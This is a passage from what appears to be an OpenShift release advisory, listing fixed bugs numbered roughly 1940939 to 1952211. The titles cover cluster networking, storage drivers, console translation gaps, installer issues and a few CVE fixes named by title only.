on v1beta1.metrics.k8s.io\n1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP\n1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster\n1940950 - vsphere: client/bootstrap CSR double create\n1940972 - vsphere: [4.6] CSR approval delayed for unknown reason\n1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16. \n1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy\n1941342 - Add `kata-osbuilder-generate.service` as part of the default presets\n1941456 - Multiple pods stuck in ContainerCreating status with the message \"failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user\" being seen in the journal log\n1941526 - controller-manager-operator: Observed a panic: nil pointer dereference\n1941592 - HAProxyDown not Firing\n1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp\n1941625 - Developer -\u003e Topology - i18n misses\n1941635 - Developer -\u003e Monitoring - i18n misses\n1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid\n1941645 - Developer -\u003e Builds - i18n misses\n1941655 - Developer -\u003e Pipelines - i18n misses\n1941667 - Developer -\u003e Project - i18n misses\n1941669 - Developer -\u003e ConfigMaps - i18n misses\n1941759 - Errored pre-flight checks should not prevent install\n1941798 - Some details pages don\u0027t have internationalized ResourceKind labels\n1941801 - Many filter toolbar dropdowns haven\u0027t been internationalized\n1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view\n1941859 - [assisted operator] assisted pod deploy first time in error state\n1941901 - Toleration merge logic does not account for multiple entries with the same key\n1941915 - No validation against template name in boot source customization\n1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description\n1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8\n1941990 - Pipeline metrics endpoint changed in osp-1.4\n1941995 - fix backwards incompatible trigger api changes in osp1.4\n1942086 - Administrator -\u003e Home - i18n misses\n1942117 - Administrator -\u003e Workloads - i18n misses\n1942125 - Administrator -\u003e Serverless - i18n misses\n1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup)\n1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail\n1942271 - Insights operator doesn\u0027t gather pod information from openshift-cluster-version\n1942375 - CRI-O failing with error \"reserving ctr name\"\n1942395 - The status is always \"Updating\" on dc detail page after deployment has failed. \n1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied\n1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate\n1942536 - Corrupted image preventing containers from starting\n1942548 - Administrator -\u003e Networking - i18n misses\n1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic\n1942555 - Network policies in ovn-kubernetes don\u0027t support external traffic from router when the endpoint publishing strategy is HostNetwork\n1942557 - Query is reporting \"no datapoint\" when label cluster=\"\" is set but work when the label is removed or when running directly in Prometheus\n1942608 - crictl cannot list the images with an error: error locating item named \"manifest\" for image with ID\n1942614 - Administrator -\u003e Storage - i18n misses\n1942641 - Administrator -\u003e Builds - i18n misses\n1942673 - Administrator -\u003e Pipelines - i18n misses\n1942694 - Resource names with a colon do not display property in the browser window title\n1942715 - Administrator -\u003e User Management - i18n misses\n1942716 - Quay Container Security operator has Medium \u003c-\u003e Low colors reversed\n1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8]\n1942736 - Administrator -\u003e Administration - i18n misses\n1942749 - Install Operator form should use info icon for popovers\n1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls\n1942839 - Windows VMs fail to start on air-gapped environments\n1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set\n1942858 - [RFE]Confusing detach volume UX\n1942883 - AWS EBS CSI driver does not support partitions\n1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy\n1942935 - must-gather improvements\n1943145 - vsphere: client/bootstrap CSR double create\n1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2)\n1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()\n1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked\n1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest\n1943238 - The conditions table does not occupy 100% of the width. \n1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane\n1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB. \n1943315 - avoid workload disruption for ICSP changes\n1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes\n1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest\n1943356 - Dynamic plugins surfaced in the UI should be referred to as \"Console plugins\"\n1943539 - crio-wipe is failing to start \"Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container\"\n1943543 - DeploymentConfig Rollback doesn\u0027t reset params correctly\n1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement\n1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds\n1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage\n1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn\n1943649 - don\u0027t use hello-openshift for network-check-target\n1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress\n1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions\n1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB\n1943845 - Router pods should have startup probes configured\n1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors\n1944160 - CNO: nbctl daemon should log reconnection info\n1944180 - OVN-Kube Master does not release election lock on shutdown\n1944246 - Ironic fails to inspect and move node to \"manageable\u0027 but get bmh remains in \"inspecting\"\n1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region\n1944509 - Translatable texts without context in ssh expose component\n1944581 - oc project not works with cluster proxy\n1944587 - VPA could not take actions based on the recommendation when min-replicas=1\n1944590 - The field name \"VolumeSnapshotContent\" is wrong on VolumeSnapshotContent detail page\n1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI\n1944631 - openshif authenticator should not accept non-hashed tokens\n1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with \".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock\"\n1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures\n1944674 - Project field become to \"All projects\" and disabled in \"Review and create virtual machine\" step in devconsole\n1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods\n1944761 - field level help instances do not use common util component \u003cFieldLevelHelp\u003e\n1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present\n1944763 - field level help instances do not use common util component \u003cFieldLevelHelp\u003e\n1944853 - Update to nodejs \u003e=14.15.4 for ARM\n1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts\n1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation\n1945027 - Button \u0027Copy SSH Command\u0027 does not work\n1945085 - Bring back API data in etcd test\n1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled\n1945103 - \u0027User credentials\u0027 shows even the VM is not running\n1945104 - In k8s 1.21 bump \u0027[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume\u0027 tests are disabled\n1945146 - Remove pipeline Tech preview badge for pipelines GA operator\n1945236 - Bootstrap ignition shim doesn\u0027t follow proxy settings\n1945261 - Operator dependency not consistently chosen from default channel\n1945312 - project deletion does not reset UI project context\n1945326 - console-operator: does not check route health periodically\n1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules\n1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]\n1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly\n1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message\n1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service\n1945548 - catalog resource update failed if spec.secrets set to \"\"\n1945584 - Elasticsearch  operator fails to install on 4.8 cluster on ppc64le/s390x\n1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION\n1945630 - Pod log filename no longer in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin\n1945646 - gcp-routes.sh running as initrc_t unnecessarily\n1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret\n1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry\n1945687 - Dockerfile needs updating to new container CI registry\n1945700 - Syncing boot mode after changing device should be restricted to Supermicro\n1945816 - \" Ingresses \" should be kept in English for Chinese\n1945818 - Chinese translation issues: Operator should be the same with English `Operators`\n1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out\n1945910 - [aws] support byo iam roles for instances\n1945948 - SNO: pods can\u0027t reach ingress when the ingress uses a different IPv6. \n1946079 - Virtual master is not getting an IP address\n1946097 - [oVirt] oVirt credentials secret contains unnecessary \"ovirt_cafile\"\n1946119 - panic parsing install-config\n1946243 - No relevant error when pg limit is reached in block pools page\n1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image\n1946320 - Incorrect error message in Deployment Attach Storage Page\n1946449 - [e2e][automation] Fix cloud-init tests as UI changed\n1946458 - Edit Application action overwrites Deployment envFrom values on save\n1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI. \n1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default\n1946497 - local-storage-diskmaker pod logs \"DeviceSymlinkExists\" and \"not symlinking, could not get lock: \u003cnil\u003e\"\n1946506 - [on-prem] mDNS plugin no longer needed\n1946513 - honor use specified system reserved with auto node sizing\n1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready\n1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster\n1946607 - etcd readinessProbe is not reflective of actual readiness\n1946705 - Fix issues with \"search\" capability in the Topology Quick Add component\n1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation\n1946788 - Serial tests are broken because of router\n1946790 - Marketplace operator flakes Available=False OperatorStarting during updates\n1946838 - Copied CSVs show up as adopted components\n1946839 - [Azure] While mirroring images to private registry throwing error: invalid character \u0027\u003c\u0027 looking for beginning of value\n1946865 - no \"namespace:kube_pod_container_resource_requests_cpu_cores:sum\" and \"namespace:kube_pod_container_resource_requests_memory_bytes:sum\" metrics\n1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken\n1946922 - Ingress details page doesn\u0027t show referenced secret name and link\n1946929 - the default dns operator\u0027s Progressing status is always True and cluster operator dns Progressing status is False\n1947036 - \"failed to create Matchbox client or connect\" on e2e-metal jobs or metal clusters via cluster-bot\n1947066 - machine-config-operator pod crashes when noProxy is *\n1947067 - [Installer] Pick up upstream fix for installer console output\n1947078 - Incorrect skipped status for conditional tasks in the pipeline run\n1947080 - SNO IPv6 with \u0027temporary 60-day domain\u0027 option fails with IPv4 exception\n1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install\n1947164 - Print \"Successfully pushed\" even if the build push fails. \n1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. \n1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48)\n1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name\u0027s\n1947360 - [vSphere csi driver operator] operator pod runs as \u201cBestEffort\u201d qosClass\n1947371 - [vSphere csi driver operator] operator doesn\u0027t create \u201ccsidriver\u201d instance\n1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout\n1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot\n1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947663 - disk details are not synced in web-console\n1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin\n1947684 - MCO on SNO sometimes has rendered configs and sometimes does not\n1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals. \n1947719 - 8 APIRemovedInNextReleaseInUse info alerts display\n1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods\n1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc?\n1947771 - [kube-descheduler]descheduler operator pod should not run as \u201cBestEffort\u201d qosClass\n1947774 - CSI driver operators use \"Always\" imagePullPolicy in some containers\n1947775 - [vSphere csi driver operator] doesn\u2019t use the downstream images from payload. \n1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade\n1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947789 - Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display\n1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert\n1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display\n1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display\n1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display\n1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin\n1947828 - `download it` link should save pod log in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel  is changed\n1947917 - Egress Firewall does not reliably apply firewall rules\n1947946 - Operator upgrades can delete existing CSV before completion\n1948011 - openshift-controller-manager constantly reporting type \"Upgradeable\" status Unknown\n1948012 - service-ca constantly reporting type \"Upgradeable\" status Unknown\n1948019 - [4.8] Large number of requests to the infrastructure cinder volume service\n1948022 - Some on-prem namespaces missing from must-gather\n1948040 - cluster-etcd-operator: etcd is using deprecated logger\n1948082 - Monitoring should not set Available=False with no reason on updates\n1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O. \n1948232 - DNS operator performs spurious updates in response to API\u0027s defaulting of daemonset\u0027s maxSurge and service\u0027s ipFamilies and ipFamilyPolicy fields\n1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later\n1948359 - [aws] shared tag was not removed from user provided IAM role\n1948410 - [LSO] Local Storage Operator uses imagePullPolicy as \"Always\"\n1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn\u0027t take effective after changing\n1948427 - No action is triggered after click \u0027Continue\u0027 button on \u0027Show community Operator\u0027 windows\n1948431 - TechPreviewNoUpgrade does not enable CSI migration\n1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node\n1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge\n1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization  TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial]\n1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes\n1948513 - get-resources.sh doesn\u0027t honor the no_proxy settings\n1948524 - \u0027DeploymentUpdated\u0027 Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute\n1948546 - VM of worker is in error state when a network has port_security_enabled=False\n1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand\n1948555 - A lot of events \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\" were seen in azure disk csi driver verification test\n1948563 - End-to-End Secure boot deployment fails \"Invalid value for input variable\"\n1948582 - Need ability to specify local gateway mode in CNO config\n1948585 - Need a CI jobs to test local gateway mode with bare metal\n1948592 - [Cluster Network Operator] Missing Egress Router Controller\n1948606 - DNS e2e test fails \"[sig-arch] Only known images used by tests\" because it does not use a known image\n1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly]\n1948626 - TestRouteAdmissionPolicy e2e test is failing often\n1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI\n1948634 - upgrades: allow upgrades without version change\n1948640 - [Descheduler] operator log reports key failed with : kubedeschedulers.operator.openshift.io \"cluster\" not found\n1948701 - unneeded CCO alert already covered by CVO\n1948703 - p\u0026f: probes should not get 429s\n1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows `bootstrap.ign was not found`\n1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile\n1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile\n1948711 - thanos querier and prometheus-adapter should have 2 replicas\n1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile\n1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile\n1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector\n1948719 - Machine API components should use 1.21 dependencies\n1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile\n1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed\n1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing\n1948771 - ~50% of GCP upgrade jobs in 4.8 failing with \"AggregatedAPIDown\" alert on packages.coreos.com\n1948782 - Stale references to the single-node-production-edge cluster profile\n1948787 - secret.StringData shouldn\u0027t be used for reads\n1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer\n1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page\n1948919 - Need minor update in message on channel modal\n1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region\n1948926 - Memory Usage of Dashboard \u0027Kubernetes / Compute Resources / Pod\u0027 contain wrong CPU query\n1948936 - [e2e][automation][prow] Prow script point to deleted resource\n1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer\n1948953 - Uninitialized cloud provider error when provisioning a cinder volume\n1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages\n1948966 - Add the ability to run a gather done by IO via a Kubernetes Job\n1948981 - Align dependencies and libraries with latest ironic code\n1948998 - style fixes by GoLand and golangci-lint\n1948999 - Can not assign multiple EgressIPs to a namespace by using automatic way. \n1949019 - PersistentVolumes page cannot sync project status automatically which will block user to create PV\n1949022 - Openshift 4 has a zombie problem\n1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil\n1949041 - vsphere: wrong image names in bundle\n1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests  (on OpenStack)\n1949050 - Bump k8s to latest 1.21\n1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv  in the case of invalid NMStateConfig\n1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service\n1949075 - Extend openshift/api for Add card customization\n1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues\n1949096 - Restore private git clone tests\n1949099 - network-check-target code cleanup\n1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol\n1949145 - Move openshift-user-critical priority class to CCO\n1949155 - Console doesn\u0027t correctly check for favorited or last namespace on load if project picker used\n1949180 - Pipelines plugin model kinds aren\u0027t picked up by parser\n1949202 - sriov-network-operator not available from operatorhub on ppc64le\n1949218 - ccoctl not included in container image\n1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs\n1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors\n1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate\n1949306 - need a way to see top API accessors\n1949313 - Rename vmware-vsphere-* images to vsphere-* images before 4.8 ships\n1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring\n1949347 - apiserver-watcher support for dual-stack\n1949357 - manila-csi-controller pod not running due to secret lack(in another ns)\n1949361 - CoreDNS resolution failure for external hostnames with \"A: dns: overflow unpacking uint16\"\n1949364 - Mention scheduling profiles in scheduler operator repository\n1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error\n1949384 - Edit Default Pull Secret modal - i18n misses\n1949387 - Fix the typo in auto node sizing script\n1949404 - label selector on pvc creation page - i18n misses\n1949410 - The referred role doesn\u0027t exist if create rolebinding from rolebinding tab of role page\n1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotConent Details tab is not translated - i18n misses\n1949413 - Automatic boot order setting is done incorrectly when using by-path style device names\n1949418 - Controller factory workers should always restart on panic()\n1949419 - oauth-apiserver logs \"[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)\"\n1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are processed not the same as in-tree plugin\n1949435 - ingressclass controller doesn\u0027t recreate the openshift-default ingressclass after deleting it\n1949480 - Listeners timeout are constantly being updated\n1949481 - cluster-samples-operator restarts approximately two times per day and logs too many same messages\n1949509 - Kuryr should manage API LB instead of CNO\n1949514 - URL is not visible for routes at narrow screen widths\n1949554 - Metrics of vSphere CSI driver sidecars are not collected\n1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error \"egress bandwidth restriction -1 is not equals\"\n1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing\n1949591 - Alert does not catch removed api usage during end-to-end tests. \n1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse\n1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command \u0027du\u0027\n1949626 - machine-api fails to create AWS client in new regions\n1949661 - Kubelet Workloads Management changes for OCPNODE-529\n1949664 - Spurious keepalived liveness probe failures\n1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot\n1949677 - multus is the first pod on a new node and the last to go ready\n1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace\n1949721 - Pick 99237: Use the audit ID of a request for better correlation\n1949741 - Bump golang version of cluster-machine-approver\n1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceed 64\n1949810 - OKD 4.7  unable to access Project  Topology View\n1949818 - Add e2e test to perform MCO operation Single Node OpenShift\n1949820 - Unable to use `oc adm top is` shortcut when asking for `imagestreams`\n1949862 - The ccoctl tool hits the panic sometime when running the delete subcommand\n1949866 - The ccoctl fails to create authentication file when running the command `ccoctl aws create-identity-provider` with `--output-dir` parameter\n1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn\u0027t work\n1949882 - service-idler build error\n1949898 - Backport RP#848 to OCP 4.8\n1949907 - Gather summary of PodNetworkConnectivityChecks\n1949923 - some defined rootVolumes zones not used on installation\n1949928 - Samples Operator updates break CI tests\n1949935 - Fix  incorrect access review check on start pipeline kebab action\n1949956 - kaso: add minreadyseconds to ensure we don\u0027t have an LB outage on kas\n1949967 - Update Kube dependencies in MCO to 1.21\n1949972 - Descheduler metrics: populate build info data and make the metrics entries more readeable\n1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal]\n1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name\n1949991 - openshift-marketplace pods are crashlooping\n1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image\n1950026 - [Descheduler] Need better way to handle evicted pod count for removeDuplicate pod strategy\n1950047 - CSV deployment template custom annotations are not propagated to deployments\n1950112 - SNO: machine-config pool is degraded:   error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791\n1950113 - in-cluster operators need an API for additional AWS tags\n1950133 - MCO creates empty conditions on the kubeletconfig object\n1950159 - Downstream ovn-kubernetes repo should have no linter errors\n1950175 - Update Jenkins and agent base image to Go 1.16\n1950196 - ssh Key is added even with \u0027Expose SSH access to this virtual machine\u0027 unchecked\n1950210 - VPA CRDs use deprecated API version\n1950219 - KnativeServing is not shown in list on global config page\n1950232 - [Descheduler] - The minKubeVersion should be 1.21\n1950236 - Update OKD imagestreams to prefer centos7 images\n1950270 - should use \"kubernetes.io/os\" in the dns/ingresscontroller node selector description when executing oc explain command\n1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers\n1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network\n1950379 - oauth-server is in pending/crashbackoff at beginning 50% of CI runs\n1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build  perm failing\n1950409 - Descheduler operator code and docs still reference v1beta1\n1950417 - The Marketplace Operator is building with EOL k8s versions\n1950430 - CVO serves metrics over HTTP, despite a lack of consumers\n1950460 - RFE: Change Request Size Input to Number Spinner Input\n1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap\n1950532 - Include \"update\" when referring to operator approval and channel\n1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift)\n1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff\n1950653 - BuildConfig ignores Args\n1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node\n1950908 - kube_pod_labels metric does not contain k8s labels\n1950912 - [e2e][automation] add devconsole tests\n1950916 - [RFE]console page show error when vm is poused\n1950934 - Unnecessary rollouts can happen due to unsorted endpoints\n1950935 - Updating cluster-network-operator builder \u0026 base images to be consistent with ART\n1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller\n1951007 - ovn master pod crashed\n1951029 - Drainer panics on missing context for node patch\n1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts\n1951042 - Panics every few minutes in kubelet logs post-rebase\n1951043 - Start Pipeline Modal Parameters should accept empty string defaults\n1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests\n1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud\n1951084 - avoid benign \"Path \\\"/run/secrets/etc-pki-entitlement\\\" from \\\"/etc/containers/mounts.conf\\\" doesn\u0027t exist, skipping\" messages\n1951158 - Egress Router CRD missing Addresses entry\n1951169 - Improve API Explorer discoverability from the Console\n1951174 - re-pin libvirt to 6.0.0\n1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd\u0027s size limit\n1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI\n1951212 - User/Group details shows unrelated subjects in role bindings tab\n1951214 - VM list page crashes when the volume type is sysprep\n1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions\n1951387 - opm index add doesn\u0027t respect deprecated bundles\n1951412 - Configmap gatherer can fail incorrectly\n1951456 - Docs and linting fixes\n1951486 - Replace \"kubevirt_vmi_network_traffic_bytes_total\" with new metrics names\n1951505 - Remove deprecated techPreviewUserWorkload field from CMO\u0027s configmap\n1951558 - Backport Upstream 101093 for Startup Probe Fix\n1951585 - enterprise-pod fails to build\n1951636 - assisted service operator use default serviceaccount in operator bundle\n1951637 - don\u0027t rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes\n1951639 - Bootstrap API server unclean shutdown causes reconcile delay\n1951646 - Unexpected memory climb while container not in use\n1951652 - Add retries to opm index add\n1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit\n1951671 - Excessive writes to ironic Nodes\n1951705 - kube-apiserver needs alerts on CPU utlization\n1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can\u0027t find created instance\n1951853 - dnses.operator.openshift.io resource\u0027s spec.nodePlacement.tolerations godoc incorrectly describes default behavior\n1951858 - unexpected text \u00270\u0027 on filter toolbar on RoleBinding tab\n1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator\n1951870 - sriov network resources injector: user defined injection removed existing pod annotations\n1951891 - [migration] cannot change ClusterNetwork CIDR during migration\n1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost\n1952001 - Delegated authentication: reduce the number of watch requests\n1952032 - malformatted assets in CMO\n1952045 - Mirror nfs-server image used in jenkins-e2e\n1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1952079 - rebase openshift/sdn to kube 1.21\n1952111 - Optimize importing from @patternfly/react-tokens\n1952174 - DNS operator claims to be done upgrading before it even starts\n1952179 - OpenStack Provider Ports UI Underscore Variables\n1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID \"SomeLongID\" already exists, but uses a different top layer: that ID\n1952211 - cascading mounts happening 